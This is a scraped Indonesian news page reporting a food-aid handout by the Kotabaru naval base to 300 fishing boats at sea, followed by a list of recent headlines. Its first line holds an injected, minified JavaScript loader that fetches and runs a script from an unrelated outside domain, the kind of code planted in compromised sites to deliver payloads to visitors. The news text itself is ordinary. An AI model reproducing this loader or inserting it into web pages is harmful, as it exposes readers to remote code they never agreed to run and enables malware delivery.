(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kotabaru

300 Nelayan Datangi Kapal TNI AL  di Tengah Laut, Ternyata Ini Penyebabnya


KANALKALIMANTAN.COM, KOTABARU – Sebanyak 300 kapal nelayan berkumpul di tengah laut, tepat di perairan kawasan permukiman Desa Rampa Lama, Kecamatan Pulau Laut Utara, Kabupaten Kotabaru, Kalimantan Selatan, Jumat (22/7/2022).

Mereka mendatangi salah satu armada milik TNI Angkatan Laut yakni KAL Kelambau II 13-49 Lanal Kotabaru. Ternyata, ada pembagian bantuan sembako yang khusus diperuntukkan bagi warga nelayan.

Kegiatan tersebut dalam rangka memperingati HUT ke-25 Lanal Kotabaru ke dan pembagian sembako tidak dilakukan di darat melainkan di tengah laut di atas kapal KAL Kelambau yang langsung didatangi oleh perahu-perahu motor milik nelayan.

Dikatakan oleh Komandan Lanal (Danlanal) Kotabaru Letnan Kolonel Laut (P) Edy Setiawan SE bahwa kegiatan terlaksana bekerjasama dengan salah satu perusahaan gas yakni PT Mubadala Petroleum.

 

Danlanal Kotabaru Letnan Kolonel Laut (P) Edy Setiawan SE. Foto: muhammad

Baca juga : Ketua Dewan Pers Azyumardi Azra Ajak Kembangkan Jurnalisme Berbasis Pancasila 

“Sebanyak 300 nelayan dari berbagai kelompok yang sebelumnya sudah didata oleh Babinpotmar Lanal Kotabaru diberikan bantuan berupa sembako,” tutur Danlanal Kotabaru kepada Kanalkalimantan.com.

Antusias ratusan nelayan dalam mengikuti  kegiatan tersebut sangat baik sekali. Pihak Danlanal Kotabaru terus menerus melaksanakan perannya melakukan pembinaan masyarakat pesisir, salah satunya kegiatan pembagian sembako untuk para nelayan Kotabaru.

“Sebelumnya Lanal Kotabaru juga telah melaksanakan pengobatan umum dan donor darah, tempatnya juga di Desa Rampa. Dimana, sebagian besar penduduknya merupakan nelayan,” tambahnya.

Dalam pelaksanaan rangkaian kegiatan HUT Lanal Kotabaru pihaknya bekerja sama dengan Injasmar dan masyarakat maritim. Di usia ke-25 Lanal Kotabaru semakin memberikan kontribusi positif kepada masyarakat khususnya masyarakat maritim.

Baca juga : Bali dan Lombok Masuk 10 Pulau Terbaik di Asia Tenggara

“Ini merupakan kepedulian yang Lanal Kotabaru berikan kepada masyarakat maritim. Tentunya diharapkan sinergitas yang sudah terbangun dengan baik terus terjaga sebagaimana harapan,” tambahhya.

Masri, salah satu nelayan dari Desa Hilir Muara, Kecamatan Pulau Laut Sigam, penerima bantuan sembako mengaku senang dengan kegiatan yang dilaksanakan oleh jajaran Lanal Kotabaru. Karena menurutnya bantuan yang disalurkan sangat bermanfaat bagi keseharian para nelayan.

“Terima kasih Lanal Kotabaru, khususnya Danlanal yang secara langsung ikut turun memberikan bantuan sembako kepada kami para nelayan. Mudah-mudahan kegiatan semacam ini akan terus dilaksanakan, sehingga kami pun sangat merasa terbantu,” ujarnya. (Kanalkalimantan.com/muhammad)

Reporter : muhammad
Editor : cell


Desy Arfianty

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

2 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

2 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

3 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

3 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

3 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

4 jam ago

This website uses cookies.